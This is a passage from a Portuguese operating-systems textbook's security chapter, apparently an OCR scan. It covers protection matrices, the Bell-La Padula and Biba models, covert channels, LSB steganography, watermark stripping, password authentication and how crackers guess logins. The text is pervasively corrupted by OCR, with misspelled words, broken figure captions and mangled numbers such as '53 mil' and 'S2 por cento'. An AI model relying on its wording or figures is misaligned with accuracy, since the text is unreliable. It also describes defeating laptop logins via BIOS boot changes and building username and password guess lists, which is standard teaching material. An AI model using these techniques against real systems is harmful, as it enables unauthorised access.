opcraędes primitwas na matriz de proteęao que poderiam 
ser usadas como base para urn modelo de qualquer sisle- 
ma de proteęao, Essas opcraęóes primitivas sao createobject, 
delete object, create domain, delete domaia insert rigbt e nemove 
right. As duas ultimas primitivas inserem e removem di rei- 
los de element os especfficos da matriz, como assegurar ao 
dominie I a permissao de ler o Arqmvo6. 

Essas seis primUivas podem ser combinadas em co- 
mandos de proteęao. Sao esses eomandos de proteęao 
que os programas do usuario podem execuiar para aherara 
matriz Eles nao podem execular dirctamentc as pnrnitivas. 
Por exemplo, o sistema pode ter um comando para criar 
urn novo arquivo, que vcrificaria se o arquivo ja existia e, 
se nao, criaria um novo objęto e daria ao proprietario todos 
os direitos dc acesso a de. Tarnbem e possivel haver um co¬ 
mando para permitir que o proprietario conceda, a alguem 
no sistema, a permissao para ler o arquivo, inserindo-se o 
dirdto J read' na emrada do novoarquivocm cada domfnio. 

A qualquer momento, a matriz determina o quc um 
processo cm um dommio qualquer pode fazer, nao o que 
ele esta autorizado a fazer. O quc o sistema implemema 
e a matriz; a autorizaęao esta relacionada com polftica de 
gerenciamcmo. Como um exemp!o dessa diferenęa, consi- 
de rem os o sistema simples da Figura 9.10, no qual os do- 
mfmos corrcspondem a usuarios. Na Figura 9.10(a), vemos 
a polftica de proteęao pretcndtda: Henriąue pode ler e cs- 
crever na a\ixaposkil7, Roberto pode ler e escrever em secreta 
e todos os u es usuarios podem ler c execu lar o compUador. 

Agora, imagioe que Roberto seja muilo mteligenie c tc- 
nha cncomrado um modo de cmiiir eomandos para que 


a matriz seja alierada e fiqiie como a Figura 9.10(b). Ele 
entao obteve acesso a caixapostal7, algo a que ele nao estava 
autorizado. Se ele tentar le-la, o sistema operadonal aten- 
dera a sua reąmsięao, pois o sistema nao sabe que o estado 
da Figura 9.10(b) nao esta autorizado. 

Deve estar cl aro agora que o conjimio de todas as ma- 
trizes possfveis pode ser dividido em dois blocos disjuntos: 
o eon junto de todos os estados autorizados e o conjimio de 
todos os estados nao autorizados. U ma ąuestao que muitas 
pcsquisas teóricas tem buscado responder e: "Dado um es¬ 
tado autorizado inicial c um conjunto de eomandos, ć pos- 
sivel provar que o sistema nimca pode alcanęar um estado 
nao autorizado?** 

Como resukado, estamos perguntando se o mecanis- 
mo disponfvel (os eomandos de proteęao) e adequado para 
implementar atguma polftica de proteęao, Dada essa polf¬ 
tica — a [gum estado inicial da matriz e o conjunto de co- 
mandos para modifica-la — o que se quer e um modo de 
provar que o sistema e seguro. Essa prova e muiio diffcil 
de conseguir; muitos sistcmas de propósito gcral nao sao 
teoricamente seguros. Harrison et al. (1976) provaram que, 
no caso de urna cotifiguraęao arbitraria para um sistema 
de proteęao arbitrario, a seguranęa nao pode ser decidida 
teoricamente. Co rundo, para um sistema espedfico, lalvez 
seja posswel provar se o sistema pode vir a passar de um es¬ 
tado autorizado para um estado nao autorizado. Para mais 
informaęoes, veja Landwehr (1981). 

9.3.71 Seguranęa multiniveis 

A maioria dos sistcmas opera cionaisper mile quc usua¬ 
rios individuais determinem quem pode ler e escrever seus 
arquivos e om ros objetos. Essa polftica e denominada con- 
trole de acesso discricionario. Em muitos ambientes 
esse modelo fundona bem, mas cxistcm outros ambientes 
nos quais sc exigc urna seguranęa muilo mais rfgtda, como 
instalaęocs inililares, departamentos dc patentes de u ma 
empresa c hospilais, Nesscs ambientes, a organizaęao tem 
regras estabelecidas sobre quem pode ver o que H c essas 
regras nao podem ser modificadas indmdualmeme por 
soldados, advogados ou medicos, a nao ser medianie urna 
permissao especial do superior. Esses ambientes precisam 
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I Figura 9.10 (a) Um estado autorizado. (b) Um estado nao autorizado. 
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de controles de acesso obrigatórios para assegurar que 
as polfticas estabeleridas sejam implementadas pelo siste- 
ma f alem dos controles de acesso discricionarios. O que es- 
ses controles de acesso obrigatórios fazom e regular o fluxo 
de iiifarmaęao, a firn dc assegurar que nao haja vazamen- 
tos imprcvistos, 

O modelo Bell-La Padula 

O modelo de seguranęa mulliniveis mais ampla menie 
usado e o modelo Bell-La Padula e, portanto, comeęare- 
mos por ele (Bell e La Padula, 1973). Esse modelo foi pro- 
jetado para o tratamento de seguranęa militar, mas tam- 
bem e aplicado a outros tipos de organizaęao. No universo 
militar, os documentos (objetos) podem ter um nfvd de 
seguranęa, como nao dassificado, confidenrial, secreto e 
altamente secreto. As pessoas tambem sao a tri buf dos esscs 
niveis, dependendo de quais documentos das podem ver. 
Um generał pode ser autorizado a ver todos os documen¬ 
tos, ja um tenente talvez permaneęa restriio a documentos 
dassificados como confldenciais e em um nfvel inferior. 
Um processo executando em favor de um usuario adquire 
o nfvel de seguranęa do usuario* Como ha mulliplos niveis 
de seguranęa, esse esquema e chamado de sistema de se¬ 
guranęa multinfyeis. 

O modelo Bell—Ln Padula apresema as seguintes regras 
sobre como a informaęao pode Ntiir: 

1. A propriedade de seguranęa simples: um pro¬ 
cesso executando em um nivel k de seguranęa pode 
kr somente objetos em seu nivel ou cm um niVel 
inferior. Por excmplo, um generał pode ler os docu¬ 
mentos de um len en te, mas um tenente nao pode 
kr os documentos de um generał. 

2. A propriedade *: um processo exccutando cm um 
nfve! k de seguranęa pode escreversomente em obje¬ 


tos de seu invel de seguranęa ou superior. Por exem- 
plo, um tenente pode colocar urna mensagem na cai- 
xa de correio de um generał dizendo tudo o que ele 
sabc, mas um generał nao pode colocar unia mensa¬ 
gem na caixa postał dc um tenente dizendo tudo o 
quc sabc, pois o generał pode ter visto documentos 
sccrctos que nao devcm ser reve!ados a um tenente, 

Em resLimo, os processos podem ler os ntveis inferiores 
e escrever nos nfveis superiores, mas nao o inverso. Se o 
sistema implemema rigorosameme essas duas proprieda- 
des, demonstra-se que nenii urna informaęao pode vazar de 
um nfvel de seguranęa superior para um inferior. A pro¬ 
priedade * foi cha ma da assim porąue, no relatório origi- 
nal, os autores nao conseguiram pensar em um bom nonie 
para da e usaram*como um no me temporario, enąuanto 
nao en c om lassem um md hor, Como nunca chegaram a 
unia soluęao rrtdhor, o relatório foi impresso com o *. Nes- 
se modelo, os processos leem e escrevem objetos, mas nao 
se comumcam diretamente uns com os outros. 0 modelo 
Bell-La Padula e ilustrado graficameme na Figura 9.11. 

Nessa figura, urna seta (linha continua) de um objęto 
atc um processo indica quc o processo esta lendo o objęto, 
isto ć, a informaęao esta Muindo do objęto para o proces¬ 
so. Da mes ma ma n dra, u ma seta (linha trącej a da} dc um 
processo para um objęto indica quc o processo esta escre- 
vendo no objęto, isto e, a informaęao esta fluindo dci pro¬ 
cesso para o objęto. Assim, todas as infmmaęoes fluem na 
direęao das sclas, Por excmplo, o processo B conseguc ler o 
objęto 1 , mas nao conseguc ler o objęto X 

A propriedade de seguranęa simples di z que todas as 
scias em linhas com fn u as (ki tura) vao para o lado ou para 
cirna. A propriedade * diz quc todas as linhas traccjadas 
(escrita) tambem vao para o lado ou para dnia. Como a 
informaęao só (tui horizontalmeme ou para cima, qualqucr 
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informaęao que tnicle fora de um nfvel k nunca podera 
aparecer em um mvel inferior. Em ouiras palavras, nunca 
havera um caminho que leve a informaęao para baixo, ga- 
rantindo, assim, a seguranęa do modelo. 

O modelo BelbLa Padu la refere-se a estrumra organi- 
zacional, mas acaba lendo de ser assegurado pelo sistema 
operadonal. Urna das maneiras de fazer isso e assodar a 
cada usuario urn mvd dc seguranęa, a ser armazenado com 
os outros dados espedficos do usuario, como o UID e o GID. 
Realizada a conexao, o shell do usuario ira obi er o nfvel 
de seguranęa do usuario, que sera herdado por todos os 
sens fillios. Se um proccsso scndo executado no mvel de 
seguranęa k tcntasse abrir um arquivo ou outro objęto cujo 
mve! de seguranęa seja mais alio do que k t o sistema ope- 
racional recusaria a temativa de aberiLEra. As leniaticas si- 
uiilarcs dc acesso a objetos com ntvd de seguranęa inferior 
a k visando a operaęoes de escriia lambćm dcvem falhar. 

O modelo Biba 

Para resumir o modelo Belt-La Pad ula em termos mili- 
tares, um teneme pode ordenar que um soldado raso reve- 
le tudo o quc sabe c, entao, copiar essa informaęao para um 
arquivo do generał sem violar a seguranęa. Agora vamos 
colocar o mesmo modelo em termos civis* Imagine urna 
empresa ua qual os zcladores tenham o mVd dc seguranęa 
i r os programadores, o myci de seguranęa 3, e o presiden- 
ic da empresa, o ruvd de seguranęa 5. Usando o modelo 
Bell—La Pad ufa, urn programador pode consultar um zc- 
lador sobie os planos da empresa para o futuro e entao 
sobrescrever os arquivos do presidente que contenham a 
estrategia da empresa* Pode ser quc nem to das as empresas 
se entusiasmem com esse modelo. 

O problema do modelo Bell-La Pad ula e que ele foi 
p roje ta do para ma n ter segredos, sem ga ran tir a integridade 
dos dados. Para isto, e necessario reverter estas proprieda- 
des (Biba, 1977): 

1. A propriedade de integridade simplesi um pro- 
cesso exeaitando no nfvd k de seguranęa só pode 
escrever em objetos de seu mvd ou de um nivel 
inferior (nao nos nivcis superiores). 

2, A propriedade de integridade *: um proccsso 
exeeutando em um nfvd k de seguranęa só pode 
ler objetos de seu nfvel ou de mvel superior (nao os 
nfveis inferior es), 

Juntas, essas propriedades asseguram quc o progra¬ 
mador ten ha eondięoes de atualizar os arquivos do zda do r 
com a informaęao adąuirida do p reskie me , mas nao o con¬ 
tra rio. fi claro que a Ig u mas organizaęoes q u erem tamo as 
propriedades do modelo Bell-La Padula quanto as proprie- 
dades do modelo Biba, mas essas propriedades estao cm 
conflko direlo c, portanto, c muito dificil implemenia-las 
si multa neameme. 


9.5.81 Canai oculto 

Todas essas idcias sobre os modelos formais e prova- 
vclmenie sobre seguranęa dc sistemas parccem muito boas r 
mas elas realnienie fundonam? Em apenas unia palavra: 
nao. Mesmo que um sistema lenha um modelo apropriado 
de seguranęa subjacente a ele e que tenha sido comprova- 
dameme seguro e corretamente irnplcmentado, falhas de 
seguranęa arnda podem ocorrcr. Ncsta scęao, discutiremos 
como a informaęao ainda pode vazar, mesmo que lenlia 
sido rigorosamenie comprovado que essa brecha e mate- 
maticamente impossfvd. Essas ideias se devem a Lampson 
(1973). 

O modelo de Lampson foi origmalmente formulado 
com base em um tlnico sistema de tempo comparlilliado, 
mas as mesmas ideias podem ser adaptadas a redes locais 
e outros arnbientes multiusuario. Na forma mais pura, ele 
envolvc tres processos cm algurna maąuina protegida. O 
primciro proccsso e o clicnte, quc espera que algum trą¬ 
bą! ho seja realśzado pelo segundo proccsso, o servidor. O 
cliente e o servidor nao eon Bani totalnie nte um no outro* 
Por exemplo, o trabalho do servidor e aj udar clientes no 
preendumento de seus form ula rios dc impostos, Os clien¬ 
tes estao preoaipados com a possibilidade de o semdor 
gravar secretamenie seus dados financeiros — por exem- 
plo r mantcndo urna lista sccrcta que informc quem ganha 
quanlo e, entao, vendendo a lista. O scrvidor esia preo- 
cupado com os clientes por causa da possibilidade de eles 
lenta rem roubar o vaiioso prograrna de impostos* 

O tercciro proccsso ć o colaborador, quc esta conspi- 
rando com o semdor para roubaros dados conlidenciais do 
dienie. O colaborador e o servidor sao, em geral, proprie¬ 
dades da mesma pessoa. Esses irds processos sao most rad os 
na Figura 9.12. O obje ti vo desse exercido e p roje tar um 
sistema que torne impossfvd ao proccsso semdor passar 
para o proccsso colaborador a informaęao quc de recebeu 
legi lima menie do proccsso dienie. Lampson chamou isso 
de o problema do confinamento. 

Do porno de vista do projetista, o objetivo e encapsular 
ou confinar o servldor dc um modo que dc nao passe a 
informaęao ao colaborador. Usando um esquema de ma- 
triz de proteęao, podemos fadlmcntc ga ran tir que o scrvi- 
dor nao se comuniąue com o colaborador escrevendo um 
arquivo que o colaborador possa apenas ler. Provavel- 
mentc tambóm seja possivel assegurar que o servtdor 
nao se comunique com o colaborador usando o mecanis* 
mo dc comunicaęao entre processos do sistema, 

Jnfelizmenie, talvez haja a dispoiiibilidade de outros 
canais de comunicaęao mais sutis. Por exeinplo, o servi- 
dor pode tentar transmitir um i\mo binario conformc o 
seguinte procedimento: para cnviar um bit i, dc faz urna 
computaęao intensiva por urna quantidade lixa de tempo. 
Para enviar um bit O, de lica inativo du ranie u mesmo in- 
tcrvalo de tempo. 
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I Figura 9.12 (a) Os processos cliente, servidor e colaborador. [b) O servidor encapsulado pode, ainda, passar inrformaędes ao 
colaborador por canais ocultos. 


O colaborador pode jteiuar deteciar o fluxo dc biis mo¬ 
nitora udo cuidadosameme seu tempo <k resposta, Em ge- 
ral, dc obiera md hor rcsposla ąuando o semdor cstivcr 
eiwiando um 0 do que ąuando esliver envianda um 1. Esse 
canal de comumcaęao e conhecido como canal oculto {co- 
vert chamie!) c ć ilustrado na Figura 9d2{b) ł 

t claro que o canal oculto e ritidoso, com miiitos si- 
uais quc na o fazem parte da informaęao, mas a informaęao 
pode ser enviada confiavelmente sobre um canal ruidoso 
mediante um código de detecęao de erros (por exemplo, o 
código de Hammingou ate mesmo algo mais sofisticado). O 
uso dc um código dc dctccęao dc erros reduz ainda mais a 
peąuena largura de banda do canal oculto, mas talvez ain¬ 
da seja suficiente para passar informaęao substancial, Esta 
basta nie claro quc nenhum modelu de proteęao com base 
em urna matriz de objetos e do min i os impedira esse lipo 
de vazamento. 

A modulaęaodo uso da CPU naoc o linico canal oculto. 
A taxa de paginaęoes lambem pode ser modulada (muitas 
faltas dc paglria significam 1; nenhuma falta de pa giną e 0). 
Na verdade, quase todo modo de degradar o desempenho 
do sistema dc urna maneira sineronizada e um candidato 
a canal oculto. Se o sistema oferece um meio de impedir o 
acesso a arquivos, entao o scrvidor pode sinalizar o lrava- 
mento dcalgum arquivo como 1 c odesiravamento como 0. 


Em a Ig u ns sistemas, e possfvel a um processo deteciar o 
status de um travamento, ate mesmo em arquivos a qne 
ele nao tenha acesso. Esse canal subliminar e ilustrado na 
Figura 9.13 r para a qual o arquivo lica impedido ou desim- 
pedido por algom imervalo fixo de tempo, conhecido tanto 
pelo servklor ąuanto pelo colaborador* Nesse exemplo esta 
sendo transmitido o fluxo seereto dc bits i 1010100. 

Bloąuear e desbloąuear um arquivo preestabeled- 
do S nao e um canal especialmente ruidoso, mas requer 
urna temporizaęao bastanie precisa, a merios quc a taxa 
de iransmissao seja rnuito baixa. A confiabilidade e o de¬ 
sempenho podem ate mesmo aumentar com o uso de um 
protocolo de nolificaęao de recebimento. Esse protocolo 
usa ouiros dois arquivos, FI e F2, bloąucados, respectiva- 
menie, peio servidor e pelo colaborador, a lim de manier 
os dois processos sineronizados. Depois que o servidor blo- 
qucia ou dcsbloqueia S f ele muda o status de travamcnto 
de FI para indicar que um bit foi eiwiado. Logo depois de 
o colaborador Icr o bit, ele muda o status de travamcnto 
de F2 indicando a o servidor que ele esta pronto para mi¬ 
tro hit e aguarda ate que FI mude novamenie, indicando 
que um outro bit esta preseme em S, Como nao ha mais 
temporizaęao, esse protocolo e completamentc confiavel, 
mesmo cm um sistema ocupado, e pode cxecutar tao ra- 
pido ąuanto dois processos puderem ser escalonados, Para 
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I Figura 9.13 Um canal subliminar bloqueando um arquivo. 
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conseguir urna largura de banda maior, por que nao usar 
dois arquivos ao mesmo tempo on fazer um canal de um 
bytc de largura com oito arquivos dc sinalizaęao, SO a $7? 

A aąuisięao e a liberaęao de recursos dedicados (um- 
dades de fitas, płotters etc.) Lambem podemser usadaspara 
sinalizaęao. O semdor adquire o recnrso para enviar um 1 
e libera-o para enviar um 0. No UNIX, o senridor pode criar 
um arquivo para indicar um 1 e remove-lo para indicar um 
0; o colaborador poderia usar a cha mada de sistema access 
para verificar se o arquivo existe> Essa chamada funriona, 
mesmo que um colaborador nao tenha permisslo para 
usar o arquivo t Infdizmentc, cxislem muitos ontros canais 
ocultos. 

Lampson tambem mendonou um modo de passar in¬ 
formaęao para um proprietario (humano) do processo ser- 
vidor. Presumivdmente o processo servidor dira quanto 
trabalho fez cm favor do clicnte, para que cstc possa ser co- 
brado* Sc a eon ta rcal do uso tomputarional c de ccm dola - 
res, por esempio, c o salario do cłiente c de 53 mil dólares, 
o senddor poderia mostrar urna conta de 100,53 dólares a 
sen proprietario. 

Encontrar todos os canais subliminares e ainda blo- 
quca-los c ex trema me nte diffciL Na pratica, pouco pode 
ser feito* Introduzir um processo que cause faltas de pagina 
aleatórias ou r dc outra mancira, gasi ar seu tempo degra- 
dando o desempenbo do sistema para reduzir a largura de 
banda dos canais subliminares nao sao propostas atraentes, 

Esteganografia 

Um lipo um pouco diferente de canal subliminar pode 
ser usado para passar informaęóes sccretas entre processos, 
mesmo com um censor humano ou automatizado inspe- 
cionando todas as mensagens entre os processos c velan¬ 
do as mensagens suspeitas. Por cxcmplo, eonsidere urna 
empresa que verifica, mannaItnentc, todas as mensagens 
eleironieas enyiadas pdos funcionarios da empresa, para 
ter cerreza de que eles nao estejam passando segredos 
para algmn aimpHce on concorrentc extemo a empresa. 


Ha como o empregado contrabandear quantidades subs- 
tandais de informaęao confidencial sob o nariz do censor? 
Certamente. 

Como exempIo, observe a Figura 9.14(a}* Essa fotogra¬ 
fia, tirada pelo autor no Quenia, contem treszebras eon tern - 
plando urna acaria. Na Figura 9.14(b), aparecem as mesmas 
tres zebras e a mesma acacia, mas ha urna atraęao extra, 
Ela ahriga o tcxto compieto, sem cories, de cinco peęas de 
Shakespcarc: Hamlet, Rei Lear, Macbeth, Omereadorde Yeneza 
e Julio Cesar. Juruas, essas peęas somam 700 KB de texto. 

Como fundo na esse canal oculto? A imagem odginał 
colorida tem 1.024 x 768 pixels. Cada pixel e formado por 
ues valores dc S bits, um para cada imensidade de venne- 
Iho, verde e azul. A cor do pijcel e forma da pela superpo- 
sięao linear das tres cores. O metodo de codificaęao usa o 
bit menos significntivo de cada valor dc cor RGB como um 
canal oculto, Assim, cada pixel tern lugar para 3 bits de in¬ 
formaęao secreta, um no vaior vermelho, urn no valor ver- 
de e um no valor azul Para urna imagem desse iamariho, 
podem-se armazenar ate 1.024 x 768 x 3 bits fou 294.912 
byt es) de informaęao secreta nela. 

O texto completo das cinco peęas e um pequeno aviso 
ocuparn ate 734.891 bytes. Esse texto primeiro foi compri- 
mido para cerca dc 274 KB usando um algoritmo-padrao 
de compressao, A saida comprimida foi, entao, criptogra- 
fada e inserida nos bits menos significativos de cada valor 
de cor. Como pode ser visto (ou, na verdade, como nao 
pode ser visto), a informaęao es ta completamente itwisi- 
veL £ igualmeme invisfvel em versdes coloridas amplia- 
das da fotografia* O oiho nao consegue distinguir cores de 
7 bits das cores de 8 bits* Urna vez que o arquivo de ima- 
gem tenha passado pelo censor, o receptor apenas separa 
todos os bits menos significativos, aplica os algoriirnos de 
decriptaęao c descompressao e recupera os 734,891 bytes 
originais. Ocultar a existenda de informaęao desse modo 
e chamado de esteganografia (do grego 'cscrila oculta')* 
A esteganografia nao e popular entre os go ve mant es que 



Figura 9.14 (a) Tr§s zebras e urna arvore, (b) Tres zebras. uma arvore e o texto complsto de cinco peęas de William Shakespeare, 













Sn#w 


Capftuio 9 Seguranęa 397 


tentam restrLngLr a comunicaęao enire sens cidadaos P mas 
e popular cmre as pessoas c|ue acreditam na libcrdade de 
ex pressa o. 

Ver as duas imagens em preto e brauco com baixa re- 
soluęao nao faz justięa ao pod er dessa tecniea, Para con- 
seguir perceber melhor como a esteganografia funciona, o 
autor preparou urna demonstraęao, inclusive com a imagem 
totalmente em cores, da Figura 9.14(b) com as cinco peęas 
embutidas. A demonstraęao pode ser encontrada em <www. 
cs,vu.nl/~ast/>. Clique no link covered wriinig, logo abaixo 
do tftulo STEGANOGRAPHY DEMO. Entao, siga as instru- 
ęocs contidas na pagina para transferira imagem c as ferra- 
mcmas dc esteganografia necessarias para cxtrair as peęas. 

Outra apkcaęao da esteganografia e para inserir marcas- 
-d'agim em imagens usadas em paginas da Web para de- 
tectar roubo ou reutilizaęao em outras paginas da Web. Se 
sną pagina contiver u ma imagem com a mcmagcm seereta 
'Copyright 2009, General Ima ges Corporation', vocc pode 
ter dc gastar algum tempo para convcncer o juiz dc quc foi 
voce mesmo que produziu aquela imagem . Miisicas, fil mes 
e outros tipos de materiał pudem ser identificados tambem 
com marcas-d r agua. 

E daro que o fato de as marcas-d'agua serem usadas 
dessa maneira encoraja algumas pessoas a encontrar um 
meio de removc-las. Um esqucma quc armazena infor- 
maęao cm bits menos signihcativos de cada pixcl pode ser 
desfeito girando a imagem em um gra u no seotido horario, 
depois convertendo-a em um sistema com perdas como o 
JPEG e, em seguida, girando um gran de volu. Por fim, a 
imagem pode ser recotwertida ao sistema de codificaęao 
original (por exemplo, gif, bmp H tif). A cotwersao de JPEG 
com perda embaralhara os bits menos significativos e as ro- 
taęoes exigirao calcu los pesados em porno flutuante r o que 
introduz erros de a rre don da mcm o, acrescentando tambem 
ruidos nos bits menos signi fi ca 11 vos* As pessoas que pocili 
as marcas-d'agua sabein disso {ou deveriani saber) c\ por- 
tamo, insercm informaęocs redundantes dc direitos sobrc 
a cópia e usam esqucmas adidonais alem do uso dos bits 
menos significativos dos pixels + Por sua vez, isso estimula 
os fraudadores a esludar tfcnicas mdhores de remoęao e 
assim sucessivameoie* 


9.4 


Todo sistema cornputacional seguro devc exigir a au- 
temicaęao de todos os usuaiios no momento de conexao. 
Alinal de contas, se o sistema opcracional nao pode ga- 
rantir qucm c o usuario, cle nao pode saber os arquivos e 
reeursos que esse usuario pode accssar. Embora a auten- 
ticaęao possa parecer um assunto triviaf da e um pouco 
mais coniplicada do que se pode esperar. 

A aulenticaęao de usuario e uma das coisas implica- 
das no que dissemos ser 'a ontogenia recapitula a łltogc- 
nia' na Seęao K5,7. Os primeiros compuladores de grandę 


porte, como o EN1AC, nao possuiam um sistema operacio- 
nal e miii to menos um procedimento de acesso ao sistema 
(login). Mais tarde, os compuladores de grandę porte cujos 
sistemas trabalhavam etn lotes e por tempo compartilhado 
tinham, cm geral, um procedimento dc acesso ao sistema 
para autcnticar os trabalhos e os usuarios. 

Os primeiros minicomputadores {por exemplo, o 
PDF-i e o PDP-S) nao apresentavam um procedimento de 
acesso ao sistema, mas, com a disseminaęao do UN1X no 
minicomputador PDP-I1, a obtenęao do acesso ao sistema 
se tor no u novamente oecessaria. Os primeiros computado- 
res pessoais {por exemplo, o Apple U e os primeiros IBM 
PCs) nao tinham um procedimento de acesso a o sistema, 
mas os sistemas operacionais de compuladores pessoais 
mais sofisticados, como o Linux e o Windows Vista, precb 
sam de um procedimento de acessoseguro (embora os usu- 
arios mais ingenuos possani dcsabilita-lo), Usar um com- 
putador pessoal para ter acesso a servidores em uma LAM 
(rede locai) corporativa sempre rcqucr a obtenęao dc acesso 
quc nao pode ser ignorada pdos usuarios. Hojc em dia, mui- 
las pessoas se concetam a compuladores remotos (indireta- 
menie) para executar operaęoes bancarias, fazer compras, 
copiar musicas e reaiizar outras operaędes comerciais. Tudo 
isso rcąuer a autemicaęao do acesso, o quc faz com que a 
validaęao do usuario seja um assunto realnienie imponante. 

Sabendo como a amemica ęao e imponante, o proximo 
passo e encontrar uma boa maneira de la że-la, A maioria 
dos metodos de amemicaęao de usuarios para quando eles 
tentam obter acesso ao sistema baseia-se em um dos tres 
prinaplos gerais de ideniificaęao: 

1. Alguma coisa que o usuario sabe. 

2. Alguma coisa que o usuario tem. 

3. Alguma coisa que o usuario e. 

As vezes dois desses princfpios sao necessarios para se- 
guranęa adicional, Esses princfpios levam a esquemas de 
autenticaęao diferentes com diferentes complexidades e 
propriedades de seguranęa. Nas próximas seęoes estudarc- 
mos ca da um de fes. 

Quem quiser causar problcmas em um sistema parti- 
cular deve, primeiro, obter acesso aqucle sistema, o quc 
signibca conseguir passar por qualquer qttc seja o procedi¬ 
mento de auiemicaęao usado. Popu lamie me, cssas pessoas 
sao chamadas de hackers. Conuido, demro do mundo da 
compmaęao, hacker' e um termo honroso reservado aos 
gran des programadores. Embora alguns dcles sejam ape- 
nas desoctipados, a maioria nao e. A imprensa trata isso 
dc modo eqmvocado. Em homenagem aos verdadeiros 
hackers, usaremos o termo no sentido original e chamare- 
nios de crackers as pessoas que leutain se infiltrar em sis¬ 
temas de computadorcs sem autojizaęao. Algumas pessoas 
fazem distmęao entre hackers de chapeu branco, que 
seriam os 'caras legaisj e hackers de chapeu preto, 
que seriam os 'malvados'. Nossa experiencia nos inostra. 
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eon tu do, que a maioria dos hackers nao sai dc casa e nao 
usa cbapeu, e, porta nto, nao e possfvel distingui-los por 
esses acessórios. 

9-4.11 Autentkacao usando senhas 

A maneira mais amplamenie usada dc autcniicaęao ć 
pedir que o usuario digile urn nomc de usuario c urna sc- 
n ha. A proteęao por sen ha e facil de cn tender c dc imple- 
meniar. A implementacjo mais sini pi es mantem u ma lista 
central dc pares (login, senha). O nomc de emrada digkado 
e b us ca do na lista e a senha digitada, comparada a senha 
armazenada, Se forem coincidentes, o aeesso sera permili¬ 
do; do contra rio, o accsso sera rej ei lado. 

Nao c predso dizer que, cnąuanto urna senha estivcr 
sendo digitada, o compuiador nao deve exibir os caracteres 
digilados, para quc ollios curiosos próximos ao terminal nao 
possam ve-los. No Windows, para cada caranere digiiado, 
e moslrado um asterisco. No UNIX, nada c exibido enąuan- 
io a senha e digitada. Esses esąuemas tern propriedades di- 
fcrentes. O csquema do Windows pode faciliiar aos usua- 
rios que nao lembram ąuanios caracteres des acabaram 
de digitau porem revcla o tamanho da senha aos 'abdhu- 
dos'. Do porno dc vista da seguranęa, o silendo vale ouro. 

Outra area quc ninguem lcva muito a serio, mas que 
traz graves implicaęoes para a seguranęa, e a ilustrada pela 
Figura 9.15. Na Figura 9.15(aj, e moslrado um procedimen- 
to dc aeesso bem-sucedido, cuja salda do sistema aparece 
cm letras maiusculas e cuja emrada do usuario aparece cm 
letras minusculas. Na Figura 9.15(b), vc-se u ma tentativa 
(rocassada de um cracker de obter aeesso ao Sistema A , Na 
Figura 9.15(0), ć ilustrada uma tentativa fracassada de um 
cracker obter aeesso ao Sistema B . 

Na Figura 9.15(b}, o sistema se mantfcsia logo que 
reccbc inna entrada com nonie itwalido. Isso e um erro, 
pois o cracker pode ficar tema udo emrar com nomes inva- 
lidos ate encontrar um nonie valido. Na Figura 9.15(c), o 
cracker pcrmanccc temando urna senha e nao obtćm inna 
resposta se o login c valido ou nao. Tudo o quc de fica sa- 
bendo ć que a combinaęao do login e da senha esta errada. 

A maioria dos notebooks esta eon figura da para exigir 
um nomc dc usuario e uma senha de modo a proteger seu 
conteiido no caso dc perda ou roubo. Em hora melhor do 
que nada, csse recurso nao c assim tao eficicme. Qualquer 


um que se aposse do notebook pode acessar a configuraęao 
do sistema basico dc entrada e saida (BIOS) pressionando 
DEL ou FS (ou qualquer outra tecla especifica que geral- 
mente e most rada na tela) antes que o sistema operado- 
nal seja inidado. Uma vcz la, c possivcl altcrar a seąuenda 
de inidalizaęao c definir quc o computador devc iniciar a 
partii dc um dispositivo conectado a uma porta USB quc 
contcnha um sistema operacional com pieto, e nao a par- 
tir do disco rfgido. Concluida a inidalizaęao, o disco rtgido 
pode ser mon lado (no UNTX) ou atessado como imtdade D: 
(no Windows). Para evitar essa simaęao, a maior parte dos 
BIOS permite que seu programa de configuraęao tambem 
seja protegido por senha, de forma a garantir que sotnen- 
te seu proprietario possa alterar a sequenda de inicializaęao. 
Assim sendo, se voce tern um notebook, interrompa a lei- 
tura agora, va definir uma senha para o BIOS e depois volte. 

Como os crackers invadem 

A maioria dos crackers iiwade apenas se conectando 
a um computador-alvo (atraves da Internet, por exem- 
plo) e lenta udo varias comb i na ęo es (login, senha) ate que 
encontrem uma que funcione. Muitas pessoas usam seus 
nomes de algunia maneira como logins. Para Carlós Apa- 
recido Alves, carlos, aives, carlos_aives, carlos.alves, calves, 
caalves e caa sao possibilidades razoaveis + Equipados com 
um daquelcs livros i n ii tul a dos 4.096 nomes para sen novo 
bebe, mais uma lista tclcfonica repleta de sobrenomes, um 
cracker pode faciimente format uma lista informatizada de 
potenciais logins apropriados aos pafses que queira atacar 
(carlos_alves pode fundonar bem no Brasil ou em Portu¬ 
gal, mas provavelnieme nao no Japao). 

ż claro que a certa r um login nao basta. Deve-se chegar 
a senha tambem. Isso e mais facil do que se pensa. O tra- 
balho classico sobre seguranęa por senha fot elaborado por 
Morris e Thompson (1979) para sistemas UN!X. Eles fize- 
ram uma lista de provavds senlias como; os primeiros e os 
ultimos nomes, nomes de rua, nomes de cidade, palavras 
do dicionarlo com um tamanho moderado (tambem pala- 
vras soletradas de tras para a frente), mi mero de placas de 
automóvel e peąuenas cadeias de caracteres aleatórias. Eles 
entao compararam sua lista com um arquivo de senhas de 
um sistema para verificar se havia algum a certo. Mais de 
86 por cen to de todas as senhas estavam em su a lista. Um 
resultado semdhaiite fot obtido por Klein (1990), 


LOGIN: mauro 
SENHA; qua1quer 
LOGIN COM SUCESSO 


LOGIN: carolina 
NOME INVALIDO 
LOGIN: 


(a) 


(b) 


LOGIN: carat i na 
SENHA; umdois 
LOGIN INVALIDO 
LOGIN: 

(c) 


I Figura 9,15 (a) Uma autenticaęao de usuario bem-sucedida. (b) AutentEcaęSo de usuario rejeitada após o nome ser inrformado, 
(c) Autenticaęao de usudrio rejeitada após o nome e a senha serem informados. 
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Alguem pode imaginar que usuarios mais qualificados 
escolliem melhor suas senhas, o que seguranienie na o e ver- 
dade. Uma analise de 1997 sobre senhas no distrito finan- 
ceiro de Londres rcvelou que S2 por cento das senhas pode- 
riam ser farilmente accrtadas. As scnlias em gerai usavam 
termos sexuais, cxpressocs ofcnsivas r nomes dc pcssoas {ou 
de um membro da familia ou dc urn atleta famoso), desti- 
nos de ferias e objetos comuns enconlrados cm escritórios 
(Kabay, 1997)- Assim, um cracker pode fazer uma lista de 
potenćais logins e de senhas sem muito trabalho. 

O crescimento da redc mundial de computadorcs pio- 
rou ainda mais o prób lenia. Em vcz de ter somente uma 
senha, muitos usuarios agora tem muitas, Como lembrar 
dc todas das e muito diffcil, clcs tcndcm a cscolhcr senhas 
simples c fracas c reutiliza-las cm diferentes sites (Florencjo 
